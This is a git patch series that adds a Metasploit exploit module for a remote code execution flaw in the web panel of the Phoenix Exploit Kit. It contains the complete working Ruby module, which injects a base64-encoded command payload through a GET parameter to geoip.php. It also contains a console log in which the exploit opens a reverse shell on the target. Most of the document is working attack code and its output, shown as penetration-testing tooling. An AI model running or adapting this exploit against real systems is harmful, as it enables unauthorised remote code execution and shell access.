From d4c82868de97115deb09bc14a04b086d9b31b579 Mon Sep 17 00:00:00 2001 From: Jay Turla Date: Fri, 19 Aug 2016 21:29:55 +0800 Subject: [PATCH 1/5] Add Phoenix Exploit Kit Remote Code Execution This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit Remote Code Execution via the geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then silently installs malware. ``` msf exploit(phoenix_exec) > show options Module options (exploit/multi/http/phoenix_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.52.128 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /Phoenix/includes/geoip.php yes The path of geoip.php which is vulnerable to RCE VHOST no HTTP server virtual host Payload options (cmd/unix/reverse): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.52.129 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Phoenix Exploit Kit / Unix msf exploit(phoenix_exec) > check [+] 192.168.52.128:80 The target is vulnerable. msf exploit(phoenix_exec) > exploit [*] Started reverse TCP double handler on 192.168.52.129:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo RZpbBEP77nS8Dvm4; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "RZpbBEP77nS8Dvm4\r\n" [*] Matching... [*] B is input... [*] Command shell session 5 opened (192.168.52.129:4444 -> 192.168.52.128:51748) at 2016-08-19 09:29:22 -0400 uname -a Linux ubuntu 4.4.0-28-generic #47-Ubuntu SMP Fri Jun 24 10:08:35 UTC 2016 i686 i686 i686 GNU/Linux ``` --- modules/exploits/multi/http/phoenix_exec.rb | 84 +++++++++++++++++++++ 1 file changed, 84 insertions(+) create mode 100644 modules/exploits/multi/http/phoenix_exec.rb diff --git a/modules/exploits/multi/http/phoenix_exec.rb b/modules/exploits/multi/http/phoenix_exec.rb new file mode 100644 index 0000000000..92469a834d --- /dev/null +++ b/modules/exploits/multi/http/phoenix_exec.rb @@ -0,0 +1,84 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Phoenix Exploit Kit Remote Code Execution', + 'Description' => %q{ + This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit Remote Code Execution via the + geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for + the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then + silently installs malware. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'CrashBandicot @DosPerl', #initial discovery + 'Jay Turla <@shipcod3>', #msf module + ], + 'References' => + [ + [ 'EDB', '40047' ], + [ 'URL', 'http://krebsonsecurity.com/tag/phoenix-exploit-kit/' ], # description of Phoenix Exploit Kit + [ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ], + ], + 'Privileged' => false, + 'Payload' => + { + 'Space' => 200, + 'BadChars' => '', + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd' + } + }, + 'Platform' => %w{ unix win }, + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ], + ['Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ] + ], + 'DisclosureDate' => 'Jun 06 2016', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path of geoip.php which is vulnerable to RCE', '/Phoenix/includes/geoip.php']), + ],self.class) + end + + def check + test = Rex::Text.rand_text_alpha(8) + res = http_send_command("echo #{test};") + if res && res.body.include?(test) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe + end + + def exploit + encoded = Rex::Text.encode_base64(payload.encoded) + http_send_command("passthru(base64_decode(\"#{encoded}\"));") + end + + def http_send_command(cmd) + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path), + 'vars_get' => { + 'bdr' => cmd + } + }) + end +end From c66ea5ff8f7bf161e3e84e4e3f57904409c45bd5 Mon Sep 17 00:00:00 2001 From: Jay Turla Date: Fri, 19 Aug 2016 21:47:57 +0800 Subject: [PATCH 2/5] Correcting the date based on the EDB --- modules/exploits/multi/http/phoenix_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/phoenix_exec.rb b/modules/exploits/multi/http/phoenix_exec.rb index 92469a834d..38ec4368be 100644 --- a/modules/exploits/multi/http/phoenix_exec.rb +++ b/modules/exploits/multi/http/phoenix_exec.rb @@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote ['Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ], ['Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ] ], - 'DisclosureDate' => 'Jun 06 2016', + 'DisclosureDate' => 'July 01 2016', 'DefaultTarget' => 0)) register_options( From 5a4f0cf72f7be1ec0d634f2c9f3a56dfc24275df Mon Sep 17 00:00:00 2001 From: Jay Turla Date: Fri, 19 Aug 2016 21:56:02 +0800 Subject: [PATCH 3/5] run msftidy --- modules/exploits/multi/http/phoenix_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/phoenix_exec.rb b/modules/exploits/multi/http/phoenix_exec.rb index 38ec4368be..5b7c98f2f4 100644 --- a/modules/exploits/multi/http/phoenix_exec.rb +++ b/modules/exploits/multi/http/phoenix_exec.rb @@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote ['Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ], ['Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ] ], - 'DisclosureDate' => 'July 01 2016', + 'DisclosureDate' => 'Jul 01 2016', 'DefaultTarget' => 0)) register_options( From e3d1f8e97bfdefd6da45d7898846fafbf1b70f09 Mon Sep 17 00:00:00 2001 From: Jay Turla Date: Fri, 19 Aug 2016 22:22:56 +0800 Subject: [PATCH 4/5] Updated the description --- modules/exploits/multi/http/phoenix_exec.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/phoenix_exec.rb b/modules/exploits/multi/http/phoenix_exec.rb index 5b7c98f2f4..5487340051 100644 --- a/modules/exploits/multi/http/phoenix_exec.rb +++ b/modules/exploits/multi/http/phoenix_exec.rb @@ -14,10 +14,10 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Phoenix Exploit Kit Remote Code Execution', 'Description' => %q{ - This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit Remote Code Execution via the - geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for - the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then - silently installs malware. + This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via the geoip.php. The + Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the + presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which + then silently installs malware. }, 'License' => MSF_LICENSE, 'Author' => From ee89b20ab73bc82caa35773ee63c8b64aec1bfbe Mon Sep 17 00:00:00 2001 From: Jay Turla Date: Fri, 19 Aug 2016 23:49:11 +0800 Subject: [PATCH 5/5] remove 'BadChars' --- modules/exploits/multi/http/phoenix_exec.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/multi/http/phoenix_exec.rb b/modules/exploits/multi/http/phoenix_exec.rb index 5487340051..5d6d7b9a35 100644 --- a/modules/exploits/multi/http/phoenix_exec.rb +++ b/modules/exploits/multi/http/phoenix_exec.rb @@ -35,7 +35,6 @@ class MetasploitModule < Msf::Exploit::Remote 'Payload' => { 'Space' => 200, - 'BadChars' => '', 'DisableNops' => true, 'Compat' => {